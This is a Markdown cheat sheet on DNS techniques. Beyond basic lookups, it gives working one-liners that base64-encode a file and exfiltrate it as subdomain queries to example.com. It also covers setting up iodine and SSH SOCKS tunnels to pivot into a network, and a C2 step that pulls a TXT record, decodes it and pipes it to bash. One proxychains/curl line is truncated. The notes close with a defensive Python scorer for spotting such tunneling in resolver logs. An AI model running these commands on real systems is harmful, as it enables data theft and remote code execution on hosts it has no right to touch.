# DNS

* [Root Servers](https://www.iana.org/domains/root/servers)
* [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/)
* [Records](https://www.cloudflare.com/learning/dns/dns-records/)

## Queries

### nslookup

```sh
nslookup -type=txt <domain>
```

### Reverse lookup

* Stored in a `PTR` record
* The reversed name looks like `<reversed-ip>.in-addr.arpa.`, but with `drill -x` or `dig -x` you pass the plain IP and the tool builds that name for you

```sh
dig -x <ip> +short
```

## Exfiltration

* Add data to UDP DNS requests
* Capture the traffic on a DNS server you control
* `253` is the max length of a DNS name, excluding dots
* `63` is the max length of a single label (subdomain)
* Encode the payload to hide it

## Infiltration

* Inside `TXT` or any other usable record type

## Usage

### Manual Tunneling

Preconditions are:

1. Domain with an `A` record
2. `NS` record pointing to the controlled DNS server, so that it resolves queries for the domain

* Attach the encoded payload as the subdomain

```sh
base64 -w0 <file> | fold -w 24 | sed -r 's/.*/&.example.com/'
```

* Query the DNS server (note the space after `+short`: awk only substitutes `$1` outside the quoted string)

```sh
base64 -w0 <file> | fold -w 24 | sed -r 's/.*/&.example.com/' | awk '{print "dig +short " $1}' | bash
```

* Optionally put the whole payload in a single query (subject to the 253-character name limit) via

```sh
base64 -w0 <file> | fold -w 24 | sed 's/.*/&./' | tr -d '\n' | sed 's/$/example.com/' | awk '{print "dig +short " $1}' | bash
```

* Decode the received data on the controlled DNS server via

```sh
echo "DomainBase64encoded.example.com" | sed 's/\.example\.com//;s/\.//g' | base64 -d
```

### Tunneling via Iodine

* [Tunnel IPv4 data through DNS](https://github.com/yarrick/iodine.git)
* Encapsulates protocols inside the DNS tunnel
* Start the server on an outside DNS server, typically a VPS (`-b <port>` forwards non-tunnel queries to a resolver on that local port)

```sh
iodined -b <port> -f -c -P <password> 10.0.0.1 tunnel.test.com
```

* Use the client via

```sh
iodine -f -r -P <password> tunnel.test.com
```

* The `NS` record of the owned domain should delegate the subdomain, e.g. `tunnel.test.com`
* The client gets a tunnel IP in the range of `10.0.0.0/8`
* Check the connection via

```sh
ping 10.0.0.1
```

* Generate an SSH key and put it on the server
* Dynamic port forwarding into the network through the server as a SOCKS proxy via ssh

```sh
ssh <user>@10.0.0.1 -4 -f -N -D <8080/1080>
```

* Use the proxy in the client's browser (e.g. the `--proxy-server` flag or a SOCKS proxy extension like FoxyProxy), or wrap tools with proxychains

```sh
proxychains curl http://$TARGET_IP/
curl --socks5 localhost:1080 http://$
```

### C2 over DNS

* Preconditions are the same as for [Manual Tunneling](#manual-tunneling)
* Plus: the data that controls the implant is placed in a `TXT` record
* That data may be a shell script that sends payloads via the ICMP data field or DNS subdomains, or executes something locally on the target
* Encode the payload and add it as a `TXT` record

```sh
base64 ./script.sh
```

* Query and execute on the target

```sh
dig +short -t TXT script.example.com | sed 's/"//g' | base64 -d | bash
```
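The same constraints the tunnel has to respect (63-character labels, base64 chunks, many distinct names under one zone) are what a resolver-side detection can key on. The following is an added example, not part of the original notes: a small Python scorer run over constructed resolver log lines in an assumed `<client> <qname> <qtype>` format, with thresholds chosen as assumptions for illustration.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample resolver log (not from any real system): "<client> <qname> <qtype>".
# The two long names mimic the 24-character base64 chunks produced by fold -w 24 above.
SAMPLE_LOG = """\
10.0.0.5 www.example.com A
10.0.0.5 mail.example.com MX
10.0.0.7 aGVsbG8gd29ybGQgdGhpcyBp.cyBhIHNlY3JldCBmaWxlCg.example.com A
10.0.0.7 c2Vjb25kIGNodW5rIG9mIGRh.dGEgZ29lcyBoZXJlCg.example.com A
10.0.0.9 script.example.com TXT
"""
BASE64_LABEL = re.compile(r"^[A-Za-z0-9+/]{16,63}={0,2}$")
LONG_LABEL, HIGH_ENTROPY, MIN_INDICATORS = 20, 3.5, 2  # thresholds are assumptions

def shannon_entropy(text):
    """Bits per character: ordinary hostnames sit around 2-3, base64 chunks above 4."""
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())

def score_query(qname, zone="example.com"):
    """Return the indicators that make one name under `zone` look like an encoded
    chunk; names outside the zone get no indicators."""
    name = qname.rstrip(".")
    if not name.lower().endswith("." + zone.lower()):
        return []
    labels = name[: -len(zone) - 1].split(".")  # keep case: it matters for entropy
    reasons = []
    if any(len(label) > LONG_LABEL for label in labels):
        reasons.append("long_label")
    if any(BASE64_LABEL.match(label) for label in labels):
        reasons.append("base64_label")
    if shannon_entropy("".join(labels)) > HIGH_ENTROPY:
        reasons.append("high_entropy")
    return reasons

def analyze(log_text, zone="example.com"):
    """Map each client to its names with >= MIN_INDICATORS indicators, and count the
    distinct names it asked for under the zone: a tunnel burns through unique names."""
    flagged, distinct = defaultdict(list), defaultdict(set)
    for line in log_text.splitlines():
        client, qname, _qtype = line.split()
        if not qname.rstrip(".").lower().endswith("." + zone.lower()):
            continue
        distinct[client].add(qname.lower())
        reasons = score_query(qname, zone)
        if len(reasons) >= MIN_INDICATORS:
            flagged[client].append((qname, reasons))
    return dict(flagged), {c: len(names) for c, names in distinct.items()}
```

Requiring two indicators keeps a single long but legitimate hostname from firing; the per-client distinct-name count is the signal that builds up over time even if each query is short.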